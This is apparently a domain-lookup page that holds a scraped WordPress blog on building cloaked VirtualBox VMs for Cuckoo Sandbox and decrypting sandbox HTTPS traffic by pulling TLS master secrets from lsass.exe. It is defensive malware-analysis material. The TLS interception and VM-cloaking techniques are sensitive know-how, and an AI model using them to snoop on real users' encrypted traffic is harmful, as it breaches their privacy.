Help
RSS
API
Feed
Maltego
Contact
Domain > jbremer.org
×
More information on this domain is in
AlienVault OTX
Is this malicious?
Yes
No
Files that talk to jbremer.org
MD5
A/V
7cb94eaa1d06816787583ec2b21c47cb
DNS Resolutions
Date
IP Address
2013-09-22
95.211.160.101
(
ClassC
)
2024-10-05
85.10.192.165
(
ClassC
)
Port 80
HTTP/1.1 200 OKDate: Sat, 05 Oct 2024 11:17:36 GMTServer: ApacheX-Pingback: http://jbremer.org/xmlrpc.phpContent-Length: 95880Content-Type: text/html; charsetUTF-8 !DOCTYPE html>!--if IE 6>html idie6 dirltr langen-US>!endif-->!--if IE 7>html idie7 dirltr langen-US>!endif-->!--if IE 8>html idie8 dirltr langen-US>!endif-->!--if !(IE 6) | !(IE 7) | !(IE 8) >!-->html dirltr langen-US>!--!endif-->head>meta charsetUTF-8 />meta nameviewport contentwidthdevice-width />title>Development & Security | By Jurriaan Bremer @skier_t/title>link relprofile hrefhttp://gmpg.org/xfn/11 />link relstylesheet typetext/css mediaall hrefhttp://jbremer.org/wp-content/themes/twentyeleven/style.css />link relpingback hrefhttp://jbremer.org/xmlrpc.php />!--if lt IE 9>script srchttp://jbremer.org/wp-content/themes/twentyeleven/js/html5.js typetext/javascript>/script>!endif-->link relalternate typeapplication/rss+xml titleDevelopment & Security » Feed hrefhttp://jbremer.org/feed/ />link relalternate typeapplication/rss+xml titleDevelopment & Security » Comments Feed hrefhttp://jbremer.org/comments/feed/ />link relEditURI typeapplication/rsd+xml titleRSD hrefhttp://jbremer.org/xmlrpc.php?rsd />link relwlwmanifest typeapplication/wlwmanifest+xml hrefhttp://jbremer.org/wp-includes/wlwmanifest.xml /> meta namegenerator contentWordPress 3.4 />meta idsyntaxhighlighteranchor namesyntaxhighlighter-version content3.1.3 />script typetext/javascript> var _gaq _gaq || ; _gaq.push(_setAccount, UA-33161212-1); _gaq.push(_trackPageview); (function() { var ga document.createElement(script); ga.type text/javascript; ga.async true; ga.src (https: document.location.protocol ? https://ssl : http://www) + .google-analytics.com/ga.js; var s document.getElementsByTagName(script)0; s.parentNode.insertBefore(ga, s); })();/script>/head>body classhome blog single-author two-column right-sidebar>div idpage classhfeed> header idbranding rolebanner> hgroup> h1 idsite-title>span>a hrefhttp://jbremer.org/ titleDevelopment & Security relhome>Development & Security/a>/span>/h1> h2 idsite-description>By Jurriaan Bremer a hrefhttps://twitter.com/skier_t>@skier_t/a>/h2> /hgroup> form methodget idsearchform actionhttp://jbremer.org/> label fors classassistive-text>Search/label> input typetext classfield names ids placeholderSearch /> input typesubmit classsubmit namesubmit idsearchsubmit valueSearch /> /form> nav idaccess rolenavigation> h3 classassistive-text>Main menu/h3> div classskip-link>a classassistive-text href#content titleSkip to primary content>Skip to primary content/a>/div> div classskip-link>a classassistive-text href#secondary titleSkip to secondary content>Skip to secondary content/a>/div> div classmenu>ul>li classcurrent_page_item>a hrefhttp://jbremer.org/ titleHome>Home/a>/li>/ul>/div> /nav>!-- #access --> /header>!-- #branding --> div idmain> div idprimary> div idcontent rolemain> nav idnav-above> h3 classassistive-text>Post navigation/h3> div classnav-previous>a hrefhttp://jbremer.org/page/2/ >span classmeta-nav>←/span> Older posts/a>/div> div classnav-next>/div> /nav>!-- #nav-above --> article idpost-234 classpost-234 post type-post status-publish format-standard hentry category-uncategorized> header classentry-header> h1 classentry-title>a hrefhttp://jbremer.org/vmcloak3/ titlePermalink to Revamped VMCloak 0.3 relbookmark>Revamped VMCloak 0.3/a>/h1> div classentry-meta> span classsep>Posted on /span>a hrefhttp://jbremer.org/vmcloak3/ title6:02 pm relbookmark>time classentry-date datetime2015-10-05T18:02:50+00:00 pubdate>October 5, 2015/time>/a>span classby-author> span classsep> by /span> span classauthor vcard>a classurl fn n hrefhttp://jbremer.org/author/jbremer/ titleView all posts by jbremer relauthor>jbremer/a>/span>/span> /div>!-- .entry-meta --> div classcomments-link> a hrefhttp://jbremer.org/vmcloak3/#respond titleComment on Revamped VMCloak 0.3>span classleave-reply>Reply/span>/a> /div> /header>!-- .entry-header --> div classentry-content> style>li p { margin: 0; padding: 0;}/* undo stupid brs by wordpress */br { display: none;}/style>h1>VMCloak 0.3: Totally revamped & Office support/h1>p>To quickly summarize - VMCloak is a tool for automatically creating, cloning,br />and cloaking Virtual Machines to be used for Cuckoo Sandbox./p>p>Earlier of this year I released a hrefhttp://jbremer.org/vmcloak2/>VMCloak 0.2/a>. Now the time has comebr />for the next release, 0.3. Most notable about this release is the revampedbr />command-line usage, the improvements with regards to installing dependenciesbr />in the Virtual Machine, and the latest dependency, Office 2007. Thanks tobr />a hrefhttps://lgscout.com/>LookingGlass Cyber Solutions/a> for supporting the development towardsbr />this release including the Microsoft Office 2007 integration./p>h1>So what about it?/h1>p>The new command-line interface feels a bit more hipster and less obtusebr />compared to how its usage used to be. Most importantly, setting up a Virtualbr />Machine is no longer a one-shot action. Instead there are now a couple ofbr />different subcommands, each to fulfill their own task.br />In addition to that the new VMCloak version utilizes the newbr />a hrefhttps://github.com/jbremer/agent>Cuckoo Agent/a> – it is less Cuckoo-specific and features more generalbr />purpose uses, allowing easier communication between the VM and the variousbr />VMCloak subcommands./p>h1>The subcommands./h1>p>As a few new commands are now available it does make sense to elaborate onbr />them a little bit. So here goes. Note that all commands can be ran either bybr />calling em>vmcloak-xyz/em> or em>vmcloak xyz/em> on the command-line./p>p>strong>vmcloak-init/strong> is the new command to initialize a new Virtual Machine. Onebr />can specify a couple of flags, but the most important one is whether this isbr />going to be a Windows XP VM or a Windows 7 VM, and in the case of Windows 7br />whether it will 32-bit or 64-bit (32-bit being the default)./p>p>So to get started we can run the following command to create a new 64-bitbr />Windows 7 VM. Note that this will be a VM em>internal/em> to VMCloak – it can notbr />be used right away in Cuckoo. For Windows XP setups a serial key is alsobr />required, on Windows 7 a serial key is optional (by default a dummy keybr />provided by Microsoft is used). And also, just a hrefhttp://jbremer.org/vmcloak2/>like before/a> youbr />still have to mount the Windows ISO file and setup em>vboxnet0/em>./p>p>pre classbrush: bash; title: ; notranslate title># Install the latest vmcloak.sudo pip install vmcloak --upgrade# Mount the Windows 7 Installer ISO.sudo mkdir -p /mnt/win7sudo mount -o loop,ro win7.iso /mnt/win7# Ensure the hostonly adapter is up.vmcloak-vboxnet0# Actually initialize the 64-bit Windows 7 VM.vmcloak init --win7x64 seven0/pre>/p>p>Fast-forward 15 to 20 minutes Windows has now been installed in your VM, thebr />VM has been shutdown, and the VM has been removed from the VirtualBoxbr />interface. All that remains is a VirtualBox harddisk file (.vdi file) inbr />~/.vmcloak/image and an entry about this new VM in VMCloaks new sqlite3br />database./p>p>Moving forward it is time to install a couple of software packages in the VM.br />Using strong>vmcloak-install/strong> we will now install all of the currently supportedbr />dependencies. The first parameter represents the name of our VM followed bybr />all the dependencies that should be installed./p>p>pre classbrush: bash; title: ; notranslate title>vmcloak install seven0 adobe9 wic pillow dotnet40 java7/pre>/p>p>Now to install Office 2007, assuming you have a valid ISO and serial key, onebr />can achieve to do so as follows. The ISO path and serial key have to bebr />provided as options to the dependency./p>p>pre classbrush: bash; title: ; notranslate title>vmcloak install seven0 office2007 \ office2007.isopath/path/to/a.iso \ office2007.serialkeyABC-DEF/pre>/p>p>If required one can also easily do manual changes to VMCloak VMs now. Bybr />calling strong>vmcloak-modify/strong> with the VM name as only parameter it is possiblebr />to change everything to your likings and simply by shutting the VM down, frombr />within Windows, the changes are made persistent. If you are running VMCloakbr />locally then the em>–vm-visible/em> argument makes sense. For remote interactionbr />with the VM you should enable VRDE support on the VM and connect to it (e.g.,br />through em>rdesktop -KPz ip:3389/em>)./p>p>Finally there is the strong>vmcloak-snapshot/strong> command which makes a snapshot ofbr />your VM. There are a couple of options available for this command, but it isbr />mostly providing the name of the VMCloak VM, the name of the resulting VM asbr />it will be used by Cuckoo, and the static IP address to assign./p>p>pre classbrush: bash; title: ; notranslate title>vmcloak snapshot seven0 cuckoo1 192.168.56.101/pre>/p>p>It is important to understand that after creating a snapshot of a VMCloak VM,br />as one does by running the em>vmcloak-snapshot/em> command on it, the VMCloak VMbr />becomes immutable. That is, you will no longer be able to runbr />em>vmcloak-install/em> or em>vmcloak-modify/em> on it. The reasoning behind this is tobr />save on valuable resources. Filling your harddisk is quite easy when you havebr />twenty Windows 7 VMs which each take up to 10GB./p>p>If one decides he or she would like to update a VMCloak VM that is of coursebr />still possible. For now the only way down that road is by cloning thatbr />particular VMCloak VM. In the following example we clone em>seven0/em> tobr />em>seven0p1/em> (or, em>seven0/em> with one patch applied)./p>p>pre classbrush: bash; title: ; notranslate title>vmcloak clone seven0 seven0p1/pre>/p>p>I hope to have shed some light on the latest release. Going at it one step atbr />a time, life has just gotten slightly easier again./p> /div>!-- .entry-content --> footer classentry-meta> span classcat-links> span classentry-utility-prep entry-utility-prep-cat-links>Posted in/span> a hrefhttp://jbremer.org/category/uncategorized/ titleView all posts in Uncategorized relcategory tag>Uncategorized/a> /span> span classsep> | /span> span classcomments-link>a hrefhttp://jbremer.org/vmcloak3/#respond titleComment on Revamped VMCloak 0.3>span classleave-reply>Leave a reply/span>/a>/span> /footer>!-- #entry-meta --> /article>!-- #post-234 --> article idpost-230 classpost-230 post type-post status-publish format-standard hentry category-uncategorized> header classentry-header> h1 classentry-title>a hrefhttp://jbremer.org/mitm/ titlePermalink to Transparent MITM with Cuckoo Sandbox relbookmark>Transparent MITM with Cuckoo Sandbox/a>/h1> div classentry-meta> span classsep>Posted on /span>a hrefhttp://jbremer.org/mitm/ title9:54 pm relbookmark>time classentry-date datetime2015-07-26T21:54:02+00:00 pubdate>July 26, 2015/time>/a>span classby-author> span classsep> by /span> span classauthor vcard>a classurl fn n hrefhttp://jbremer.org/author/jbremer/ titleView all posts by jbremer relauthor>jbremer/a>/span>/span> /div>!-- .entry-meta --> div classcomments-link> a hrefhttp://jbremer.org/mitm/#respond titleComment on Transparent MITM with Cuckoo Sandbox>span classleave-reply>Reply/span>/a> /div> /header>!-- .entry-header --> div classentry-content> style>li p { margin: 0; padding: 0;}/* undo stupid brs by wordpress */br { display: none;}/style>h1>Transparent MITM with Cuckoo Sandbox/h1>p>In a series of upcoming blogposts I will be sharing a fair amount of coolbr />features that have been worked on over the past year in Cuckoo Sandbox. Thisbr />first blogpost features Man in the Middle support for Cuckoo Sandbox./p>p>(For those that are familiar Cuckoo Sandbox and the general ideas behind MITM,br />please scroll down to the em>slightly/em> more exciting stuff in the strong>Transparentbr />snooping of HTTPS traffic/strong> paragraph)./p>h1>So, man in the middle?/h1>p>As we are well aware MITM is generally used to explain the process of snoopingbr />on otherwise encrypted information, in this case network traffic. In thisbr />blogpost we will dive into two different ways of doing MITM:/p>ul>li>Providing a CA Root Certificate to allow a MITM proxy to intercept traffic./li>li>Transparent dumping of TLS Master Secrets to decrypt TLS traffic./li>/ul>h1>Eh, Cuckoo Sandbox?/h1>p>Before we continue onto the MITM stuff first a reminder on Cuckoo Sandbox. Asbr />some of you will be familiar with, a hrefhttp://cuckoosandbox.org/>Cuckoo Sandbox/a> is an Open Sourcebr />Automated Malware Analysis Sandbox. Analyses are performed by starting a VMbr />(Virtual Machine) and running the potentially malicious sample, or URL as webr />will be exploring in this blogpost, inside the VM. Then stopping the VM oncebr />the analysis is done./p>p>Due to a personal interest, and that of some of my clients, Cuckoo has beenbr />getting much, much better at analyzing Internet Explorer and alike in the pastbr />few months. Both in actually analyzing it, but also due to developmentsbr />outside of the actual analysis, as will be outlined in this blogpost.br />(For a part of the improvements on the analysis part I would like to thankbr />Brad Spengler for continuously providing feedback and bug fixes)./p>h1>At work with mitmproxy/h1>p>The first solution to provide MITM support to Cuckoo was to integrate a toolbr />called a hrefhttp://mitmproxy.org/>mitmproxy/a>, created by Aldo Cortesi and maintained by fellowbr />a hrefhttp://honeynet.org/>The Honeynet Project/a> member Maximilian Hils./p>p>As outlined by the documentation mitmproxy works bybr />a hrefhttp://mitmproxy.org/doc/certinstall.html>installing a CA Root Certificate/a> on the target device, in this case abr />VM running either Windows XP or Windows 7./p>p>After Googling around and looking at GUI dialogs to em>import/em> certificates intobr />the Windows Certificate store I finally managed to find anbr />a hrefhttps://github.com/cuckoobox/cuckoo/blob/85d15a81314e9953c58a8fa8102d069eb8aa8abb/analyzer/windows/modules/auxiliary/installcert.py#L35-L36>easy command-line way to import a certificate/a> (that only works onbr />Windows 7, not Windows XP). So basically invoking certutil.exe imports a .p12br />certificate, this certificate can be found in ~/.mitmproxy after runningbr />mitmproxy once (the first time mitmproxy is ran on a system it automaticallybr />creates a unique set of certificates)./p>p>At this point there are two ways to throttle traffic from the VM intobr />mitmproxy. For the time being I have a hrefhttps://github.com/cuckoobox/cuckoo/blob/130247f4f2260fe85fd463464c78f1504c34efe2/analyzer/windows/modules/packages/ie.py#L98-L115>taken the easy way/a>, whichbr />involves explicitly routing traffic through a socks4/5 proxy, but thisbr />approach has obvious disadvantages:/p>ul>li>This technique is em>not/em> compatible with a hrefhttps://www.owasp.org/index.php/Certificate_and_Public_Key_Pinning>Certificate Pinning/a>./li>li>Looking at the PCAP file all traffic goes to the proxy./li>li>Having to explicitly tunnel traffic through socks4/5 translates into thisbr /> technique not working for anything but Internet Explorer (i.e., at thisbr /> point no support has been provided for other applications)./li>li>Hostnames are not resolved in the VM. Did I mention all the traffic goes tobr /> the proxy?/li>/ul>p>A better approach would be to route VM traffic to the proxy by the use of abr />tool such as a hrefhttp://darkk.net.ru/redsocks/>redsocks/a> (not to be confused with a hrefhttp://redsocks.nl/>RedSocks/a>, abr />Dutch startup and one of my clients, providing the malware threat defender, abr />network security appliance for detecting malware infections and other unwantedbr />software in your corporate network).br />Anyway, a possible drawback of such tool is the requirement of having tobr />configure it through various root commands, a requirement that generally isbr />not available to Cuckoo once it is running. I have to look into this later..br />(And also this technique still requires the CA Root Certificate and thus it isbr />not compatible with Certificate Pinning)./p>h1>Transparent snooping of HTTPS traffic/h1>p>Going a bit more in-depth with a hrefhttps://en.wikipedia.org/wiki/HTTPS>HTTPS/a> and a hrefhttps://en.wikipedia.org/wiki/Transport_Layer_Security>TLS/a> we learnbr />that in the a hrefhttp://www.moserware.com/2009/06/first-few-milliseconds-of-https.html>TLS protocol/a> the client and server exchange a per-sessionbr />em>random/em> which, a hrefhttp://security.stackexchange.com/questions/89383/why-does-the-ssl-tls-handshake-have-a-client-and-server-random/89655#89655>in combination with the master secret/a>, can bebr />used to derive the encryption keys, MAC keys, and IVs (when needed) which inbr />turn allow one to fully decrypt the TLS stream./p>p>Reading further we find a hrefhttp://reverseengineering.stackexchange.com/questions/2681/is-it-possible-to-decrypt-an-ssl-connection-short-of-bruteforcing/2695#2695>where and how to intercept the PRF function/a> bybr />Brendan Dolan-Gavitt, the a hrefhttps://github.com/moyix/panda>developer of PANDA/a>. We also find whichbr />information is required a hrefhttps://ask.wireshark.org/questions/4229/follow-ssl-stream-using-master-key-and-session-id>to decrypt TLS streams in Wireshark/a>./p>p>Time to take a step back. So we require the RSA Session ID, which, as definedbr />in the a hrefhttp://www.moserware.com/2009/06/first-few-milliseconds-of-https.html>TLS protocol/a>, can be extracted from the em>Server Hello/em> record.br />We also require the Master Secret, which, a hrefhttp://security.stackexchange.com/questions/89383/why-does-the-ssl-tls-handshake-have-a-client-and-server-random/89655#89655>as we have seen/a>, canbr />be extracted from the PRF function call. By instrumenting the PRF functionbr />call looking for calls which feature the “key expansion” string (as defined inbr />a hrefhttp://tools.ietf.org/html/rfc2246#page-21>RFC 2246/a>) we see that we can extract the master secret together withbr />the server random./p>p>Long story short. If we extract each pair of em>server random/em> and em>masterbr />secret/em> from the PRF function in lsass.exe (Brendan outlined that all TLSbr />encryption is performed by the lsass.exe service on Windows, Windows 7 atbr />least), and if we extract em>Server Hello/em> records from the PCAP file whichbr />links the em>Session IDs/em> to the em>server random/em>, thenbr />we can cross-reference this information to write the Master Secret file withbr />matching RSA Session ID and Master Secrets for each TLS session that wasbr />negotiated during the analysis in the VM. (Note that to cross-reference webr />extracted the server random in both scenarios, once from the Server Hellobr />record and once from the PRF “key expension” function call)./p>p>Fast forward various long nights debugging code, many changes and improvementsbr />to Cuckoo to be able to facilitate all of this in the first place, andbr />matching the various pieces of extracted information to each other, we finallybr />conclude with functionality in Cuckoo to dump a tlsmaster.txt file for eachbr />analysis./p>p>To recap some facts about this transparent approach:/p>ul>li>It does not require any special handling for the instrumented application,br /> just to the instrumented lsass.exe service./li>li>Cuckoo can decrypt any TLS/HTTPS stream that uses the Windows API to performbr /> the TLS/HTTPS encryption. Including those of Windows Update, etc./li>li>Since there is no need to proxy the traffic through some 3rd party tool, thebr /> PCAP file looks the same as it would without our transparent sniffer./li>li>As nothing happens with the TLS itself, applications that use Certificatebr /> Pinning are supported./li>/ul>p>Following a screenshot showing Wireshark with a PCAP containing decryptedbr />HTTPS traffic of an analysis going to the login page of the Dutch bankingbr />website ING using the latest Cuckoo Sandbox:/p>p>img altWireshark vs ING src/wp-posts/ing.png />/p>h1>HTTP/HTTPS replay tool/h1>p>Because I was not really able to find such code elsewhere, and because tsharkbr />falls under the em>not invented here/em> rule, I worked up a small Python projectbr />that a hrefhttps://github.com/jbremer/httpreplay>extracts HTTP and HTTPS streams/a> from a PCAP file withbr />according TLS Master Secrets file. To be fair, integrating a tool such asbr />tshark with a tool such as Cuckoo Sandbox is suboptimal, as naturally one ofbr />the future goals is to include decrypted https traffic in the Cuckoo reportsbr />without having to depend on tools like mitmproxy (due to the non-transparencybr />thing)./p>p>The final goal of em>httpreplay/em> will, as one might expect, be to transparentlybr />replay HTTP/HTTPS traffic from a PCAP file. At the moment this last step hasbr />not been implemented yet, though. Aside other goals this can be used tobr />reproduce and unittest analysis of certain websites with Cuckoo Sandbox,br />etc, etc./p>p>Quickly running the httpreplay tool on the same PCAP as shown earlier we findbr />the following output (just URLs of extracted HTTP/HTTPS streams):/p>p>pre classbrush: bash; title: ; notranslate title>$ python httpreplay.py dump.pcap tlsmaster.txthttp://mijn.ing.nl/https://mijn.ing.nl/internetbankieren/https://mijn.ing.nl/favicon.ico.../pre>/p>p>Some readers may note this tool is very similar to a thousand others in itsbr />field, one of which being a hrefhttps://github.com/omriher/CapTipper>CapTipper/a>, developed by our friends atbr />CheckPoint. At the moment the only added value of em>httpreplay/em> would be httpsbr />support (and perhaps proper TCP reassembly and the future goal of being ablebr />to operate multi-gigabyte files – in-memory loading and all that)./p>h1>Conclusion/h1>p>Knowledge about TLS was gained. Tools were reinvented. Cuckoo Sandbox gainedbr />some new tricks. I finally wrote another blogpost img srchttp://jbremer.org/wp-includes/images/smilies/icon_wink.gif alt;) classwp-smiley /> /p> /div>!-- .entry-content --> footer classentry-meta> span classcat-links> span classentry-utility-prep entry-utility-prep-cat-links>Posted in/span> a hrefhttp://jbremer.org/category/uncategorized/ titleView all posts in Uncategorized relcategory tag>Uncategorized/a> /span> span classsep> | /span> span classcomments-link>a hrefhttp://jbremer.org/mitm/#respond titleComment on Transparent MITM with Cuckoo Sandbox>span classleave-reply>Leave a reply/span>/a>/span> /footer>!-- #entry-meta --> /article>!-- #post-230 --> article idpost-218 classpost-218 post type-post status-publish format-standard hentry category-uncategorized> header classentry-header> h1 classentry-title>a hrefhttp://jbremer.org/vmcloak2/ titlePermalink to VMCloak 0.2: Windows 7 Support relbookmark>VMCloak 0.2: Windows 7 Support/a>/h1> div classentry-meta> span classsep>Posted on /span>a hrefhttp://jbremer.org/vmcloak2/ title10:56 am relbookmark>time classentry-date datetime2015-03-18T10:56:35+00:00 pubdate>March 18, 2015/time>/a>span classby-author> span classsep> by /span> span classauthor vcard>a classurl fn n hrefhttp://jbremer.org/author/jbremer/ titleView all posts by jbremer relauthor>jbremer/a>/span>/span> /div>!-- .entry-meta --> div classcomments-link> a hrefhttp://jbremer.org/vmcloak2/#respond titleComment on VMCloak 0.2: Windows 7 Support>span classleave-reply>Reply/span>/a> /div> /header>!-- .entry-header --> div classentry-content> style>li p { margin: 0; padding: 0;}/* undo stupid brs by wordpress */br { display: none;}/style>h1>VMCloak 0.2: Windows 7 Support/h1>p>A couple of months ago I a hrefhttp://jbremer.org/vmcloak>released/a> the first version ofbr />a hrefhttps://github.com/jbremer/vmcloak>VMCloak/a>, now it’s time for version em>0.2/em>. VMCloak is a tool forbr />automatically creating and configuring em>Virtual Machines/em> forbr />a hrefhttp://cuckoosandbox.org/>Cuckoo Sandbox/a>./p>h1>What’s new?/h1>p>In this version of VMCloak we introduce the long-awaited strong>Windows 7/strong>br />support. This means VMCloak can now automatically create and configurebr />Windows 7 virtual machines for Cuckoo Sandbox./p>h1>Usage/h1>p>Those who have used VMCloak in the past will see that creating Windows 7br />virtual machines is now just as easy as creating Windows XP virtual machines.br />Creating a Windows 7 virtual machine goes as follows:/p>p>pre classbrush: bash; title: ; notranslate title># Install the latest vmcloak.sudo pip install vmcloak --upgrade# Mount the Windows 7 Installer ISO.sudo mkdir -p /mnt/win7sudo mount -o loop,ro win7.iso /mnt/win7# Ensure VirtualBox hostonly adapter is up.vmcloak-vboxnet0# Create a Win7 VM with the name win7_0.# This will take about 15 to 20 minutes.vmcloak -r --win7x64 win7vm/pre>/p>p>Besides a couple of internal changes, the only thing that changed for Windowsbr />XP support is that you’ll now have to specify strong>–winxp/strong> when creating abr />Windows XP virtual machine, for example:/p>p>pre classbrush: bash; title: ; notranslate title>vmcloak -r --winxp winxp0 --serial-key AAAAA..EEEEE/pre>/p>h1>32-bit vs 64-bit/h1>p>With Windows 7 in mind, it makes sense that VMCloak now supports both 32-bitbr />and 64-bit Windows 7 installations. This mostly means that VMCloak willbr />install a 64-bit version of the .NET framework, the 64-bit version of thebr />Microsoft C Runtime, etc.br />For this to work, however, you’ll have to inform VMCloak that the 64-bitbr />libraries should be used instead of the 32-bit ones. This can either bebr />achieved by passing the strong>–x64/strong> flag to vmcloak, or by combining thebr />strong>–win7/strong> and strong>–x64/strong> flags straight into the strong>–win7x64/strong> flag./p>p>(The upcoming version of Cuckoo Sandbox, version 1.3, will supportbr />strong>64-bit analysis/strong>!)/p>h1>VMCloak Birds/h1>p>For those who want to deploy multiple virtual machines in a relatively shortbr />time window while preserving as many resources as possible might likebr />VMCloak’s strong>bird/strong> feature.br />VirtualBox has em>immutable/em> disks, disks that are created once and then neverbr />changed; any changes on top of the immutable disk are then written to a newbr />VirtualBox disk. VMCloak uses this to create a em>bird image/em> – a fullybr />installed and configured Windows installation. Creating a Virtual Machinebr />ready to be used by Cuckoo Sandbox out of this bird image then consists of abr />couple of steps:/p>ul>li>Create a new Virtual Machine./li>li>Attach the immutable bird image./li>li>Boot into Windows./li>li>Configure a unique static IP address for this VM./li>li>Run Cuckoo and take a snapshot of the VM./li>/ul>p>Naturally all these steps are handled by strong>vmcloak-clone/strong>./p>p>Bird images are strong>crucial/strong> when running a Cuckoo Sandbox instance with morebr />than a handful of VMs on one machine. Whereas creating a new VM with Windows 7br />installed, such as a bird image, takes about 15 minutes of time and almostbr />10gb of diskspace, creating a clone of a bird image takes less than a minutebr />and less than 1gb per clone.br />em>Note that you’ll still need the bird image, also after cloning!/em> (Basicallybr />instead of installing Windows 7 10 times for 10 VMs, the bird image allows youbr />to install Windows 7 once and then re-use this installation)./p>p>Following is a quick guide to setting up 10 VMs using a VMCloak bird. Runningbr />these commands should take up to half an hour to finish – just enough to gobr />for lunch./p>p>pre classbrush: bash; title: ; notranslate title># Create the 64-bit Windows 7 Bird.vmcloak -r --win7x64 --bird win7bird# Create 10 VMs.for i in {0..9}; do vmcloak-clone -r --bird win7bird win7_$idone/pre>/p>h1>What’s next?/h1>p>As always further cloaking the VMs is on the roadmap. If anyone has tricks &br />tips on known detection vectors that would be useful for VMCloak, please dobr />let me know. E.g., registry keys containing known values specific tobr />virtualization software, etc./p>p>Other than that, I’ve been working hard on 64-bit analysis for Cuckoo Sandboxbr />for a while now, so there’s that img srchttp://jbremer.org/wp-includes/images/smilies/icon_wink.gif alt;) classwp-smiley /> And a bunch of other new and upcomingbr />features in Cuckoo./p>h1>Contact/h1>p>For any questions or suggestions, please feel free tobr />a hrefmailto:jurriaanbremer_at_gmail_dot_com>reach out to me/a>./p> /div>!-- .entry-content --> footer classentry-meta> span classcat-links> span classentry-utility-prep entry-utility-prep-cat-links>Posted in/span> a hrefhttp://jbremer.org/category/uncategorized/ titleView all posts in Uncategorized relcategory tag>Uncategorized/a> /span> span classsep> | /span> span classcomments-link>a hrefhttp://jbremer.org/vmcloak2/#respond titleComment on VMCloak 0.2: Windows 7 Support>span classleave-reply>Leave a reply/span>/a>/span> /footer>!-- #entry-meta --> /article>!-- #post-218 --> article idpost-214 classpost-214 post type-post status-publish format-standard hentry category-uncategorized> header classentry-header> h1 classentry-title>a hrefhttp://jbremer.org/vmcloak/ titlePermalink to VMCloak: Automated Virtual Machine Generation and Cloaking for Cuckoo Sandbox relbookmark>VMCloak: Automated Virtual Machine Generation and Cloaking for Cuckoo Sandbox/a>/h1> div classentry-meta> span classsep>Posted on /span>a hrefhttp://jbremer.org/vmcloak/ title7:50 am relbookmark>time classentry-date datetime2014-09-22T07:50:07+00:00 pubdate>September 22, 2014/time>/a>span classby-author> span classsep> by /span> span classauthor vcard>a classurl fn n hrefhttp://jbremer.org/author/jbremer/ titleView all posts by jbremer relauthor>jbremer/a>/span>/span> /div>!-- .entry-meta --> div classcomments-link> a hrefhttp://jbremer.org/vmcloak/#comments titleComment on VMCloak: Automated Virtual Machine Generation and Cloaking for Cuckoo Sandbox>2/a> /div> /header>!-- .entry-header --> div classentry-content> style>li p { margin: 0; padding: 0;}/* undo stupid brs by wordpress */br { display: none;}/style>h1>VMCloak: Automated Virtual Machine Generation and Cloaking/h1>p>Today I present you a tool that I’ve been working on for a while,br />a hrefhttp://vmcloak.org/>vmcloak/a>. For those of you familiar with a hrefhttp://cuckoosandbox.org/>Cuckoo Sandbox/a>br />and setting it up you’ll surely be aware of the pain that is strong>configuringbr />virtual machines/strong>./p>h1>VMCloak 101/h1>p>Somewhat complete documentation can be found at a hrefhttp://vmcloak.readthedocs.org/en/latest/>readthedocs.org/a>,br />however, a quick introduction of the related commands is of course thebr />easiest. (strong>Do note that VMCloak has mostly been tested on Ubuntu/Debian, sobr />other distributions might not work, yet./strong>)/p>p>Basically you need a few things to get started:/p>ul>li>vmcloak (strong>sudo pip install vmcloak/strong>)/li>li>Windows XP Installer ISO file/li>li>Windows XP Serial Key (that works with your installer!)/li>li>genisoimage & VirtualBox (strong>sudo apt-get install genisoimage virtualbox/strong>)/li>li>Two directories for VirtualBox files./li>/ul>p>First we have to a hrefhttp://vmcloak.readthedocs.org/en/latest/config.html#conf-mounted-iso>mount the windows installer ISO file/a>:/p>p>pre classbrush: bash; title: ; notranslate title>sudo mkdir -p /mnt/winxpsudo mount -o loop,ro /path/to/your/winxp.iso /mnt/winxp/pre>/p>p>Now we have to a hrefhttp://vmcloak.readthedocs.org/en/latest/vbox.html>start vboxnet0 if it has not already been started/a>:/p>p>pre classbrush: bash; title: ; notranslate title># If this returns nothing, then vboxnet0 hasnt# been started.VBoxManage list hostonlyifs# Create vboxnet0 and assign the correct IP address.VBoxManage hostonlyif createVBoxManage hostonlyif ipconfig vboxnet0 --ip 192.168.56.1/pre>/p>p>And then two directories are required – a directory where VirtualBox’ snapshotbr />files will be stored, and a directory where the VirtualBox harddisk files andbr />installer ISO files will be stored. Note that you might want to place thebr />snapshot files in a em>tmpfs/em> container to ensure VMs load pretty muchbr />instantly./p>p>pre classbrush: bash; title: ; notranslate title>mkdir ~/vms/ ~/vm-data//pre>/p>p>Having setup the mount directory, the hostonly interface, and the VirtualBoxbr />directories we’re now good to go with regards to creating our first VM withbr />VMCloak. It is recommended to use the strong>recommended settings/strong> by providingbr />the strong>-r/strong> switch. By default the hostonly IP address will be set tobr />192.168.56.101, however, if you intend to create multiple VMs then you’ll havebr />to give each VM a unique IP address (i.e., 192.168.56.102, 192.168.56.103,br />etc.) In order to automatically register the newly created VM with Cuckoobr />you’ll have to set the strong>cuckoo directory/strong> so we’ll do this as well./p>p>We’re now going to make a VM with the name strong>cuckoo1/strong> and the IP addressbr />strong>192.168.56.101/strong>:/p>p>pre classbrush: bash; title: ; notranslate title>vmcloak -r -d --vm-dir ~/vms/ --data-dir ~/vm-data/ \ --iso-mount /mnt/winxp --serial-key AAAAA...EEEEE \ --hostonly-ip 192.168.56.101 --cuckoo ~/cuckoo/ \ cuckoo1/pre>/p>p>The strong>-d/strong> switch causes vmcloak to spit out debugging messages which may bebr />helpful in some cases. This command will take strong>up to 30 minutes/strong> to finish -br />on the machines I’ve tested it’s usually less than or roughly 10 minutes./p>p>So.. get yourself something to drink, wait for a bit, and you should have abr />VM ready to be used by Cuckoo./p>h1>Allowing VMs full internet access/h1>p>It is possible to a hrefhttp://vmcloak.readthedocs.org/en/latest/network.html>give VMs full internet access/a>, even strong>after/strong>br />creating them, without modifying the VMs themselves. If your networkbr />configuration is “regular” (i.e., a working internet connection at eitherbr />strong>eth0/strong> or strong>wlan0/strong>) then you’ll only have to run one command:/p>p>pre classbrush: bash; title: ; notranslate title>sudo vmcloak-iptables/pre>/p>h1>TODO/h1>p>Of course this is a never-ending project and it’s still actively beingbr />developed img srchttp://jbremer.org/wp-includes/images/smilies/icon_wink.gif alt;) classwp-smiley /> Things on the TODO list include, but are not limited to:/p>ul>li>Windows 7 support/li>li>Further VM cloaking (making the VM as stealth as possible)/li>li>VMWare Workstation support/li>li>Support for installing Adobe / Microsoft Office / etc in the VM/li>li>Loads more../li>/ul>h1>Source/h1>p>Of course there’s an a hrefhttp://vmcloak.org/>official website/a> and naturally the source codebr />can be found on a hrefhttps://github.com/jbremer/vmcloak>github/a>./p>h1>Credits/h1>p>Further credits go to Thorsten Sick of a 